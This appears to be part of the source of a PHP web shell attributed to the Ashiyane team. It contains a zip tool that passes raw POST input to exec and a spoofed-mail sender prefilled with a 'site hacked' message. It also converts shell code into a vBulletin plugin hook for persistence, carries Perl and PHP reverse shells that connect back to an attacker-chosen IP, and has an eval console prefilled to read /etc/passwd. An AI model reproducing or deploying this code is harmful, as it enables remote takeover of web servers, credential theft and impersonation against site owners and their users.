base64_decode('ICAgIGlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykgfHwgIWZpbGVfZXhpc3RzKCRzb3VyY2UpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkemlwID0gbmV3IFppcEFyY2hpdmUoKTsNCiAgICBpZiAoISR6aXAtPm9wZW4oJGRlc3RpbmF0aW9uLCBaSVBBUkNISVZFOjpDUkVBVEUpKSB7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICAkc291cmNlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCByZWFscGF0aCgkc291cmNlKSk7DQoNCiAgICBpZiAoaXNfZGlyKCRzb3VyY2UpID09PSB0cnVlKQ0KICAgIHsNCiAgICAgICAgJGZpbGVzID0gbmV3IFJlY3Vyc2l2ZUl0ZXJhdG9ySXRlcmF0b3IobmV3IFJlY3Vyc2l2ZURpcmVjdG9yeUl0ZXJhdG9yKCRzb3VyY2UpLCBSZWN1cnNpdmVJdGVyYXRvckl0ZXJhdG9yOjpTRUxGX0ZJUlNUKTsNCg0KICAgICAgICBmb3JlYWNoICgkZmlsZXMgYXMgJGZpbGUpDQogICAgICAgIHsNCiAgICAgICAgICAgICRmaWxlID0gc3RyX3JlcGxhY2UoJ1xcJywgJy8nLCAkZmlsZSk7DQoNCiAgICAgICAgICAgIC8vIElnbm9yZSAiLiIgYW5kICIuLiIgZm9sZGVycw0KICAgICAgICAgICAgaWYoIGluX2FycmF5KHN1YnN0cigkZmlsZSwgc3RycnBvcygkZmlsZSwgJy8nKSsxKSwgYXJyYXkoJy4nLCAnLi4nKSkgKQ0KICAgICAgICAgICAgICAgIGNvbnRpbnVlOw0KDQogICAgICAgICAgICAkZmlsZSA9IHJlYWxwYXRoKCRmaWxlKTsNCg0KICAgICAgICAgICAgaWYgKGlzX2RpcigkZmlsZSkgPT09IHRydWUpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHppcC0+YWRkRW1wdHlEaXIoc3RyX3JlcGxhY2UoJHNvdXJjZSAuICcvJywgJycsICRmaWxlIC4gJy8nKSk7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlIGlmIChpc19maWxlKCRmaWxlKSA9PT0gdHJ1ZSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkemlwLT5hZGRGcm9tU3RyaW5nKHN0cl9yZXBsYWNlKCRzb3VyY2UgLiAnLycsICcnLCAkZmlsZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKSk7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZSBpZiAoaXNfZmlsZSgkc291cmNlKSA9PT0gdHJ1ZSkNCiAgICB7DQogICAgICAgICR6aXAtPmFkZEZyb21TdHJpbmcoYmFzZW5hbWUoJHNvdXJjZSksIGZpbGVfZ2V0X2NvbnRlbnRzKCRzb3VyY2UpKTsNCiAgICB9DQoNCiAgICByZXR1cm4gJHppcC0+Y2xvc2UoKTs='); if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>')) { $newfunc = create_function('$source,$destination', $code); $dirzip = $_POST['dirzip']; $zipfile = $_POST['zipfile']; if($newfunc($dirzip, $zipfile)){ echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><Br>'; }else {echo '<b><span style="color:red">Error!!!...</span></b><Br>';} } } else { echo ' <center> <br /><br /> <form action="?action=zipper&dir='.$path.'#down" method="post"> <a name="down"></a> Dir: <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['path']).'" size="60"/><br /><br /> Save Dir: <input type="text" name="zipfile" value="ashiyane.zip" size="60"/><br /><br /> <input type="submit" value=">>" name="ziper" /> <br /><br /> </form></center> '; if(isset($_POST['ziper']) && ($_POST['ziper'] == '>>')) { $dirzip = trim($_POST['dirzip']); $zipfile = trim($_POST['zipfile']); if(exec("zip -r $zipfile $dirzip")){ echo '<b><span style="color:green">Directory Or File Ziped Successfully !</span></b><br>'; }else {echo '<b><span style="color:red">ERROR!!!...</span></b><br>';} } } } if($action=="fakemail"){ echo ' <center><form action="?action=fakemail&dir='.$path.'#down" method="post"> <a name="down"></a> <table> <tr> <td> <font color="#FFF"><b>Mail to : </b></font></td><td><input placeholder="Victim" size="30" type="text" name="mailto" /> </td> </tr> <tr> <td> <font color="#FFF"><b>From : </b></font></td><td><input type="text" size="30" placeholder="Hacker@mail.com" name="mailfrom" /> </td> </tr> <tr> <td> <font color="#FFF"><b>Subject : </b></font></td><td><input type="text" size="30" value="Your Site Has Been Hacked" name="mailsubject" /> </td> </tr> </table><br> <textarea rows="6" cols="60" name="mailcontent">Hi Admin :)</textarea> <br><input type="submit" value=">>" name="mailsend" /> </form></center><br><br>'; if(isset($_POST['mailsend']) && ($_POST['mailsend'] == '>>')) { $mailto = $_POST['mailto']; $mailfrom = $_POST['mailfrom']; $mailsubject = $_POST['mailsubject']; $mailcontent = $_POST['mailcontent']; if(@mail($mailto,$mailsubject,$mailcontent,"FROM:$mailfrom")) { echo '<center><span style="color:green"><b>Mail successfully Sent!</b></span></center>'; } else echo '<center><span style="color:red"><b>Mail Not Sent!</b></span></center>'; } } if($action=="php2xml"){ echo" <center> <b><font>Convert PHP To XML For Vbulletin Shell</font></b> <form action=\"?action=php2xml&dir=$path#down\" method='post'> <a name=\"down\"></a> <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/> <input type='submit' name='go' value='Convert' /> <input type='reset' value='Clear' name='reset'><br/><br/> </p> </form></center>"; if(isset($_POST['go']) && $_POST['go'] == 'Convert' ) { if ( get_magic_quotes_gpc() ){ $code=stripslashes($_POST['code']); } else{ $code=$_POST['code']; } $code = 'base64_decode('.$code.')'; $head = '<?xml version="1.0" encoding="ISO-8859-1"?> <plugins> <plugin active="1" product="vbulletin"> <title>vBulletin</title> <hookname>init_startup</hookname> <phpcode><![CDATA[if (strpos($_SERVER["PHP_SELF"],"subscriptions.php")) {'; $foot = 'exit; }]]></phpcode> </plugin> </plugins>'; echo"<br/><center><textarea rows='10' name='users' cols='80' style='border: 2px dashed #1D1D1D; background-color: #000000; color:#C0C0C0'>"; echo $head.'base64_decode(\''.base64_encode($code).'\');'.$foot; echo '</textarea></center><br>'; } echo '</center></div>'; } if($action=="bc"){ function extension($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } $back_connect_p='#!/usr/bin/perl use Socket; $iaddr=inet_aton($ARGV[0]) || die("Error: $!\n"); $paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n"); $proto=getprotobyname("tcp"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("/bin/sh -i"); close(STDIN); close(STDOUT); close(STDERR); '; echo "<center><h3><span>Back Connect</span></h3>"; echo "<form method=\"post\" action=\"?action=bc&dir=$path#down\"> <input type=\"hidden\" name=\"type\" value=\"perl\"> <span>PERL BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'><input type=submit name=bc value='>>'></form></b>"; echo "<br><form method=\"post\" action=\"?action=bc&dir=$path#down\"> <input type=\"hidden\" name=\"type\" value=\"php\"> <span>PHP BACK CONNECT<br></span><br><b>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit name=bc value='>>'></form><br>"; if(isset($_POST['type'])) { function cf($f,$t) { $w = @fopen($f,"w") or @function_exists('file_put_contents'); if($w){ @fwrite($w,$t); @fclose($w); } } if($_POST['type'] == 'perl') { cf("/tmp/bc.pl",$back_connect_p); $out = extension("perl /tmp/bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &"); echo "<span style=\"color:green\">Successfully opened reverse shell to ".$_POST['server'].":".$_POST['port']."<br>Connecting...[Perl]</span>"; @unlink("/tmp/bc.pl"); } if($_POST['type']=='php') { @set_time_limit (0); $ip = $_POST['server']; $port =$_POST['port']; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; if (function_exists('pcntl_fork')) { $pid = pcntl_fork(); if ($pid == -1) { echo "Cant fork!<br>"; exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { echo "<span style=\"color:red\">Error: Can't setsid()</span><br>"; exit(1); } $daemon = 1; } else { echo "<span style=\"color:red\">WARNING: Failed to daemonise. This is quite common and not fatal<br></span>"; } chdir(htmlspecialchars($GLOBALS['path'])); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { echo "$errstr ($errno)"; exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { echo "ERROR: Can't spawn shell<br>"; exit(1); } @stream_set_blocking($pipes[0], 0); @stream_set_blocking($pipes[1], 0); @stream_set_blocking($pipes[2], 0); @stream_set_blocking($sock, 0); echo "<span style=\"color:green\">Successfully opened reverse shell to $ip:$port [Php]</span><br>"; while (1) { if (feof($sock)) { echo "<span style=\"color:red\">ERROR: Shell connection terminated</span><br>"; break; } if (feof($pipes[1])) { echo "<span style=\"color:red\">ERROR: Shell process terminated</span><br>"; break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) echo "SOCK READ<br>"; $input=fread($sock, $chunk_size); if ($debug) echo "SOCK: $input<br>"; fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) echo "STDOUT READ<br>"; $input = fread($pipes[1], $chunk_size); if ($debug) echo "STDOUT: $input<br>"; fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) echo "STDERR READ<br>"; $input = fread($pipes[2], $chunk_size); if ($debug) echo "STDERR: $input<br>"; fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); echo "</pre>"; } } } if($action=="eval"){ ?><center> <span style="font-size:20px;"><b>PHP Eval</b></span> <a name="down"></a><form action="?action=eval&dir=<?php echo $path;?>#down" method="post"> <table><tr><td> <textarea name="eval" style="width:1000px;height:300px;"> <?php if(isset($_POST['submiteval'])) { echo eval(magicboom($_POST['eval']));} else{ echo "echo file_get_contents('/etc/passwd');"; } ?> </textarea> </td></tr> <tr><td> <input type="submit" value="Do !" name="submiteval" /> </td></tr> </table></form> </center> <?php } if($action=="logout"){ ?> <form action="?action=logout" method="post"> <span>Do You Really Want To Logout From Shell?</span><br /> <input type="submit" value="Yes" name="accept" /> </form> <?php if(isset($_POST['accept']) && $_POST['accept'] != "" && $_POST['accept']=="Yes"){ unset($_SESSION[$_SERVER['HTTP_HOST']]); header("location: ?action=explorer"); } } } //Coded By Mahdi.Hidden ~ Ashiyane Digital Security Team ?> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc></div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ php shell | 0day shell | <a href=http://localroot.net>localroot.net</a> | <a href=http://localroot.net>localroot.net</a> | <a href=http://www.localroot.net>LocalRoot</a> | php exploit ]---o</b></font></div></td></tr></table> <br /> </div> </div> </body> </html>